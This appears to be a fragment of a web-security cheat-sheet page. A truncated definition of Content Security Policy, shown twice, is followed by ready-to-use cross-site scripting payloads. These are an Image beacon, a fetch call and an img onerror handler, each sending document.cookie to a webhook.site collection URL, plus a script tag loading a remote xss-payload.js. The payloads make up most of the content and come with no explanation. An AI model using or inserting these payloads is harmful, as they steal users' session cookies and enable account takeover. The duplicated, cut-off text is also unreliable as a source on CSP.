Content Security Policy
Content Security Policy is a computer security standard introduced to prevent cross-site scripting, clickjacking and other code injection attacks resulting from execution of malicious content in the t
Last updated
Content Security Policy is a computer security standard introduced to prevent cross-site scripting, clickjacking and other code injection attacks resulting from execution of malicious content in the t
Last updated
x = new Image(); x.src = ' https://webhook.site/5c8c958e-5a74-4fbb-8d6c-c0f298bc44f9?data='+btoa(document.cookie);
fetch('https://webhook.site/5c8c958e-5a74-4fbb-8d6c-c0f298bc44f9/?c=' + document.cookie)
<img src=x onerror="fetch('https://webhook.site/5c8c958e-5a74-4fbb-8d6c-c0f298bc44f9' + document.cookie)" /><script src="https://cdn.jsdelivr.net/gh/b4ndit23/WebAcademy-Resources@main/xss-payload.js "></script>